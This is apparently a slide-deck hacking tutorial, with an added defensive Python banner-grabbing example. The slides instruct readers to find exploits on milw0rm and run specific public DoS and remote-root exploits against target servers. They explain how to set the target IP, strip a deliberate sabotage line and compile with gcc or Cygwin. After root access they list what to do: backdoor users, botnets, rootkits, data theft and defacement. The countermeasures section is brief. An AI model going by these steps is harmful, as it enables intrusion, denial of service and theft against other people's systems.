• If you are using Windows Vista, then telnet is not installed by default. Use Control Panel - Programs and Features - Turn Windows features on or off - Telnet Client to install it
• If you found port 21 (ie FTP) open, then telnet www.targetsite.com 21 to find out the FTP software
• Use Nmap's full version detection option to get this information if telnet doesn't work
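What the telnet step above does, written as an added Python example (not from the slides) a defender can run against their own hosts to see which product and version strings they volunteer before an attacker does: connect, send nothing, read the greeting, and pull a product/version pair out of it. It starts a constructed local listener in place of a real FTP daemon so the example runs offline; the greeting text and the product/version regex are assumptions of the example, and the regex is a heuristic that real banners will not always fit.

```python
from __future__ import annotations

import re
import socket
import threading

# Heuristic: first "Word 1.2.3"-style product/version pair in a greeting banner.
# Separator may be a space, slash or underscore ("ProFTPD 1.3.5", "OpenSSH_7.4").
PRODUCT_VERSION_RE = re.compile(
    r"(?P<software>[A-Za-z][A-Za-z0-9_-]*)[ /_]v?(?P<version>\d+(?:\.\d+)+)"
)


def start_banner_server(banner: bytes) -> int:
    """Start a throwaway listener on 127.0.0.1 that greets each client with `banner`
    and closes. Returns the chosen port. Stand-in for a real daemon so the example
    runs offline; the banner text is constructed, not captured from any real host."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """Connect, send nothing, and return whatever the service volunteers first.
    This is what the telnet step does by hand; FTP, SMTP and SSH all speak first."""
    chunks: list[bytes] = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            while sum(len(c) for c in chunks) < 4096:
                data = s.recv(1024)
                if not data:          # peer closed: banner complete
                    break
                chunks.append(data)
        except socket.timeout:        # service sent its greeting and is now waiting on us
            pass
    return b"".join(chunks).decode("ascii", errors="replace").strip()


def parse_banner(banner: str) -> tuple[str, str] | None:
    """Extract (software, version) from a banner, or None if nothing version-like is present."""
    m = PRODUCT_VERSION_RE.search(banner)
    return (m["software"], m["version"]) if m else None


def inventory(host: str, ports: list[int]) -> dict[int, tuple[str, str] | None]:
    """Grab and parse the banner on each listed port of one host. Ports that refuse
    the connection are left out; ports that answer without a version map to None."""
    result: dict[int, tuple[str, str] | None] = {}
    for port in ports:
        try:
            banner = grab_banner(host, port)
        except OSError:
            continue
        result[port] = parse_banner(banner)
    return result


if __name__ == "__main__":
    # Constructed greeting echoing the BeroFTPD 1.3.4 example later in the slides.
    port = start_banner_server(b"220 BeroFTPD 1.3.4(1) ready.\r\n")
    print(grab_banner("127.0.0.1", port))
    print(inventory("127.0.0.1", [port]))
```

The inventory result is the list you want to compare against your patch level: any port whose banner parses to an old version is a place to either update or, where the service allows it, stop advertising the version string at all.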
Network Hacking Techniques
Searching for Vulnerabilities
Searching for Vulnerabilities
• Search a couple of vulnerability databases for an exploit
• If there's an exploit available, run it against the server and take complete control
• Popular exploit databases are Milw0rm, SecurityFocus, OSVDB
• If there isn't any, you can move on to another open port and try again on a different service. Alternatively develop a "0-day" exploit
• No one knows about the vulnerability; hundreds of websites can be hacked before the vulnerability is discovered and patched
• The hacker could sell the vulnerability for thousands of dollars
• It shows that the hacker is very skillful and raises his rank in the hacker community
Attacks used against discovered vulnerabilities
• Denial-of-Service (DoS): Send a flood of information to the target server, causing it to use up all of its resources and in return pushing it offline or denying requests to others
• Buffer Overflow (BoF): The extra information overflows into other buffers, causing them to be overwritten with malicious code created by the hacker. Once this code is executed, the hacker can receive full control of the server
Network Hacking Techniques
Searching for Vulnerabilities
Types of Exploits
• Local Exploit: You must first have access and privileges on the machine. Local exploits are usually used to escalate one's privileges to admin or root
• Remote Exploit: It isn't run locally, but launched from anywhere across the internet
• A hacker usually has to use a combination of both remote and local exploits to gain full control of a system. For example, the hacker may have been able to gain regular privileges with a remote exploit attack, and then be able to escalate to root privileges with the help of a local exploit
Network Hacking Techniques
Penetrating
Penetrating
• Running the exploits against the target and penetrating the server
DoS PHP exploit: http://milw0rm.com/exploits/2901
• Install PHP onto your computer. WAMP is a free web server that comes with PHP
• Paste the PHP exploit into notepad or any word processor and save it as "exploit.php"
• On line 13 of this exploit you will see: $address = gethostbyname('192.168.1.3'); edit here the IP address of the target
• Save this edited file into the PHP directory on your server that contains the PHP executable file. In WAMP the directory would be C:\wamp\bin\php\php5.2.5
• To run it simply type in "php exploit.php" and hit enter
• When skilled hackers create exploits, they sometimes insert mistakes or extra code so that script kiddies with no programming knowledge wouldn't be able to use them
• At line 18 of this exploit, we see $junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu"; Just remove this line and the error will disappear
• A DoS attack will be launched against the target website until you exit the command screen
• The site will begin to lag and it'll take a long time to load pages. Eventually the server may go down completely
Network Hacking Techniques
Penetrating
DoS Perl exploit: http://milw0rm.com/exploits/6581
• Download and install the appropriate version of ActivePerl
• Edit the options like the target server and others as needed. Then save the file as "exploit.pl". As you can see, Perl exploits begin with "#!/usr/bin/perl"
• Run the exploit by typing: "perl exploit.pl"
Python, C/C++ on Linux
• Python exploit: http://milw0rm.com/exploits/3523
• Most C/C++ exploit code is made to be compiled in Linux
• Save the remote root exploit http://milw0rm.com/exploits/269 as "exploit.c"
• Install a development package of all the libraries and headers needed to compile C/C++ code with sudo apt-get install build-essential
• Once the hacker has run the script against a vulnerable server running BeroFTPD 1.3.4 and the script worked, the hacker would have root access to the server
Network Hacking Techniques
Penetrating
C/C++ on Windows
• To run in Windows, you can use Cygwin
• Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer, allowing you to run Linux scripts in Windows
• Download Cygwin from http://www.cygwin.com/
• Using the same exploit as the last example, save and move it into the "C:\cygwin" directory as "exploit.c"
• In the "C:\cygwin" directory do "gcc exploit.c -o exploit"
• To run the file "exploit.exe", simply type "./exploit"
• You get root access to the target computer
Network Hacking Techniques
Penetrating
Root access
Once you get root access, you can do
• Add yourself as a permanent user for future access
• Add the server into your botnet collection so it can be used as a weapon against other servers
• Use it as a proxy to hack other websites
• Install a rootkit so you can come back and have full control over the server when needed
• Constantly steal information as it comes
• Use the system to store illegal data
• Deface the website; sometimes the hacker will delete everything off of the server
Network Hacking Countermeasures
Network Hacking
Countermeasures
• Keep all your software up to date
• There will always be new vulnerabilities coming out, and your responsibility is to patch them immediately after a patch comes out
• Implement a firewall. This will keep most of the bad data out and good data in
• Install anti-virus software
• Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system
References
• http://www.learn-how-to-hack.net
• http://www.MrCracker.com
• http://hackthisway.com
Presentation available at
http://akdhamija.webs.com/
For any Clarification, mail me at